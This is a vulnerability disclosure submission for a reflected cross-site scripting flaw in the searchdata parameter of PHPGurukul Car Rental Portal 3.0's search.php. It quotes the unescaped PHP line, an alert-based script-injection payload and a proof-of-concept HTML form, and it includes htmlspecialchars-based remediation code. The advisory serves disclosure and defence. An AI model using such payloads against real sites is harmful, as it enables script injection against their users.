Submit #435179: PHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax - Info

Title: PHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax

Description:

[XSS vulnerability] found in Car Rental Portal 3.0 - (search.php)

Affected Project: Car Rental Portal
Web: Php
Vendor: PHPGurukul
Official Website: (https://phpgurukul.com/car-rental-project-php-mysql-free-download/)
Version: 3.0
Updated: 05 June 2024
Vulnerable file: /search.php
Injection parameter: searchdata
Size: 16.0 MB
Sha256: 8a9ad60cf5f36e2c3c4a1ce6fed7438bb458a2d2489e2a1be60dbbdd481fdf8b

Vulnerability Description:

The issue arises because the `searchdata` parameter from the URL is being directly inserted into the value attribute of an HTML input element without proper sanitization. This allows an attacker to inject arbitrary HTML or JavaScript code leading to an XSS attack.

Vulnerable code:

```
<h1>Search Result of keyword "<?php echo $_POST['searchdata'];?>"</h1>
```

Injection Payload Tested:

We set `searchdata` to:

```
"><script>alert('XSS')</script>
```

Execution:

When the browser parses this through a POST request, it executes the `<script>alert('XSS')</script>` code, resulting in a popup displaying `"XSS"`.

Demonstration:

Below is what `search.php` looks like:

https://i.postimg.cc/mg6Vs6Vd/1.png

As it is a POST request, we need to use a file test_form.html with the following content to be able to trigger the XSS popup:

```
<!DOCTYPE html>
<html>
<head>
    <title>Search Form</title>
</head>
<body>
    <form action="http://localhost:8000/carrental/search.php" method="POST">
        <input type="text" name="searchdata" value='"><script>alert("XSS")</script>'>
        <input type="submit" value="Search">
    </form>
</body>
</html>
```

Then we have to open it in the browser. For example: file:///home/username/Desktop/test_form.html

https://i.postimg.cc/nVYkzL09/2.png

After submitting the payload using POST with the vulnerable parameter `searchdata` and the XSS payload `"><script>alert('XSS')</script>`, XSS is triggered:

https://i.postimg.cc/t4fdfnCw/3.png

Recommendation for Preventing XSS:

To fix this vulnerability, we must always sanitize user inputs before rendering them in the HTML. We can use functions like htmlspecialchars() in PHP to encode special characters.

Example:

```
// Retrieve the search data using GET
$searchData = isset($_GET['searchdata']) ? $_GET['searchdata'] : '';

// Escape the output to prevent XSS
$safeSearchData = htmlspecialchars($searchData, ENT_QUOTES, 'UTF-8');
```

> One Click Can Change Everything: Be Secure.
Source: ⚠️ https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20Car%20Rental%20Portal%203.0%20-%20(search.php).md
User: secuserx (UID 76735)
Submission: 01/11/2024 01:17 (2 years ago)
Moderation: 01/11/2024 18:07 (17 hours later)
Status: Accepted
VulDB Entry: 282869 [PHPGurukul Car Rental Portal 1.0 /search.php searchdata cross site scripting]
Points: 20
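
The submission's recommendation, applied to the POST parameter that the quoted vulnerable line actually reads, as an added example that is not part of the submission and is not PHPGurukul's code. The helpers `e()`, `search_keyword()` and `render_search_page()` are hypothetical names, and the sample input is constructed from the string quoted in the report. It encodes the keyword for both the heading shown in the vulnerable line and the value-attribute context the description mentions.

```php
<?php
declare(strict_types=1);

// Added example, not PHPGurukul's code. render_search_page() is a hypothetical
// stand-in for the part of /search.php that prints the search keyword.

/** Encode untrusted text for HTML element content and quoted attribute values. */
function e(string $text): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close an attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Read searchdata from the POST body; treat arrays (searchdata[]=x) as empty. */
function search_keyword(array $post): string
{
    $raw = $post['searchdata'] ?? '';
    return is_string($raw) ? trim($raw) : '';
}

/** Build the heading and the search box with the keyword encoded once, at output. */
function render_search_page(array $post): string
{
    $keyword = e(search_keyword($post));
    return '<h1>Search Result of keyword "' . $keyword . '"</h1>' . "\n"
         . '<input type="text" name="searchdata" value="' . $keyword . '">' . "\n";
}

// Constructed input: the string quoted in the report, passed as plain data.
$sample = ['searchdata' => '"><script>alert(\'XSS\')</script>'];
echo render_search_page($sample);

// In the real page the call would be: echo render_search_page($_POST);
```

Encoding happens at the point of output, so the stored or searched value stays unchanged and the same helper can be reused wherever `searchdata` is echoed.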
